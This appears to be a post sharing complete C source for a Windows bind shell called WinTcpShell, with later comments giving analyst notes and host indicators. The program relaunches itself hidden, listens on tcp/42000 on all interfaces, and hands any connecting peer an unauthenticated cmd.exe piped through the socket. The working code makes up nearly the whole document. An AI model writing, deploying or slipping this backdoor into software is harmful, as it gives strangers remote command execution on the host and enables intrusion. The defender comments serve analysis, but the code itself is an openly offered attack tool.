I couldn't find any Windows(TM) code that listened on a port and spawned a shell, so I wrote some.
/*
 * WinTcpShell
 * tcpshell.c
 *
 * cl tcpshell.c /link wsock32.lib Ws2_32.lib
 *
 * This code runs a copy of itself and then exits.
 * The copy that is left running in memory opens a port and
 * waits for a connection.
 * When a connection is made it runs cmd.exe with stdin,
 * stdout and stderr piped in and out of the socket.
 * This code is released into the public domain
 * with no restrictions other than Microsoft's copyrights
 * and patents and trademarks and criminal liabilities
 * that might apply.
 */
#include <sys\types.h> #include <winsock2.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <io.h>
#define LISTENQ SOMAXCONN
/* File-scope state shared by main(). All of it has static storage, so every
 * field below starts zeroed; main() relies on that for lsocket (see its
 * `if (!lsocket)` test) and, in the launcher branch, for si. */
WSADATA WSAData;            /* filled in by WSAStartup() in main() */
int status;                 /* WSAStartup() result, later the WSAGetLastError() value after a failed bind() */
int lsocket = 0;            /* listening socket; 0 until created. Declared int rather than the Winsock SOCKET type. */
int csocket = 0;            /* accepted connection in the listener, or the bare value 2 in the launcher (argc == 1) path */
struct sockaddr_in laddr;   /* local address: INADDR_ANY, tcp/42000 (set in main()) */
struct sockaddr_in caddr;   /* peer address written by accept(); never read afterwards in this file */
int len;                    /* sizeof(laddr) / sizeof(caddr), passed to bind() and accept() */
STARTUPINFO si;             /* std-handle redirection + SW_HIDE for the child; only the listener branch calls GetStartupInfo() on it */
PROCESS_INFORMATION pi;     /* child process/thread handles; nothing in this file closes or waits on them */
char spawn_cmd[] = "d:\\winnt\\system32\\cmd.exe";   /* hard-coded shell path, no %SystemRoot%/PATH lookup */
char copy_command[] = ".\\tcpshell.exe copy";        /* relaunch command line; the "copy" argument makes argc > 1 in the child */
/*
 * Entry point for both roles of this program (see the file header):
 *
 *   argc == 1 (no arguments): the launcher. Spawns ".\tcpshell.exe copy" with
 *             CreateProcess() and then exit(0)s, leaving the copy running.
 *   argc >  1 (the "copy"): the listener. Binds tcp/42000 on INADDR_ANY and,
 *             for every accepted connection, starts cmd.exe with its
 *             stdin/stdout/stderr set to the accepted socket and its window
 *             hidden (SW_HIDE), then loops back to accept().
 *
 * Analyst / defender notes, all visible in this function:
 *   - There is no authentication or access control: any peer that can reach
 *     tcp/42000 gets an interactive cmd.exe running under the account of the
 *     listener process.
 *   - Host indicators: a process listening on tcp/42000; a tcpshell.exe process
 *     spawning cmd.exe from the hard-coded spawn_cmd path with a hidden window;
 *     a second tcpshell.exe launched with the single argument "copy".
 *   - Nothing here calls closesocket(), CloseHandle() or WSACleanup(), so each
 *     accepted socket and each child's process/thread handle stays open in the
 *     listener for as long as it runs.
 *
 * Returns 10 when WSASocket() or listen() fails; every other exit is via
 * exit() or abort().
 */
int main(int argc, char *argv[]) {
    printf("%d\nOh boy are we having fun now!\n", argc);   /* prints argc: 1 = launcher, >1 = listener */
    /* Winsock 2.0 start-up. NOTE(review): perror() prints strerror(errno), and
     * Winsock calls do not set errno, so this message (and the ones at listen()
     * and accept() below) will not describe the real failure; the bind() path
     * reports WSAGetLastError() instead. */
    if ((status = WSAStartup(MAKEWORD(2, 0), &WSAData)) != 0) { perror("WSAStartup() error"); exit(1); }
    while (1) {
        if (argc > 1) {
            /* Listener role. The listening socket is created once (lsocket is 0
             * on the first pass) and reused for every later connection. */
            if (!lsocket) {
                /* WSASocket() with dwFlags == 0 is used instead of socket();
                 * presumably to obtain a non-overlapped socket that can serve as
                 * a child's standard handle - TODO confirm against the Winsock
                 * documentation. */
                if ( (lsocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0)) == INVALID_SOCKET) {
                    printf("socket error: %0x", WSAGetLastError());
                    return (10);
                }
                len = sizeof(laddr);
                memset(&laddr, 0, len);
                laddr.sin_addr.s_addr = htonl(INADDR_ANY);   /* every local interface */
                laddr.sin_family = AF_INET;
                laddr.sin_port = htons(42000);               /* fixed listening port */
                if ( (bind (lsocket, (const struct sockaddr *) &laddr, len))) {
                    status = WSAGetLastError();
                    printf("bind error: %d\n", status);
                    exit(1);
                }
                if (listen(lsocket, LISTENQ)) { perror("listen error"); return (10); }
            }
            /* Block until a peer connects. NOTE(review): &caddr is a
             * struct sockaddr_in * passed where accept() expects struct sockaddr *,
             * without the cast that the bind() call above uses. */
            len = sizeof(caddr);
            if ((csocket = accept(lsocket, &caddr, &len)) == INVALID_SOCKET) { perror("socket accept"); abort(); }
            GetStartupInfo(&si);   /* only this branch initialises si */
        } else {
            /* Launcher role. NOTE(review): 2 is a bare integer that is used below
             * as the child's standard handles; it is not obtained from
             * GetStdHandle() and its meaning is not established by this file.
             * GetStartupInfo() is not called on this path, so si keeps its
             * zeroed static-storage contents (including si.cb). */
            csocket = 2;
        }
        /* Redirect the child's standard handles to csocket and hide its window.
         * The int socket value is stored into the HANDLE fields without a cast;
         * the child can use it only because CreateProcess() below is called with
         * bInheritHandles = TRUE. */
        si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_HIDE;
        si.hStdOutput = csocket;
        si.hStdError = csocket;
        si.hStdInput = csocket;
        /* Launcher: spawn the socket-listening copy of this program
         * (".\tcpshell.exe copy") that is left running in memory. */
        if (argc == 1) {
            if (!CreateProcess (NULL, copy_command, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
                printf("error in CreateProcess copy_command");
                exit(1);
            }
        }
        /* Listener: spawn cmd.exe from the hard-coded spawn_cmd path with stdin,
         * stdout and stderr piped in and out of the accepted socket. The handles
         * returned in pi are neither waited on nor closed. */
        if (argc > 1) {
            if (!CreateProcess (spawn_cmd, NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
                printf("error in CreateProcess spawn_cmd");
                exit(1);
            }
        }
        /* The launcher finishes after one pass; the listener loops back to accept(). */
        if (argc == 1) { exit(0); }
    }
}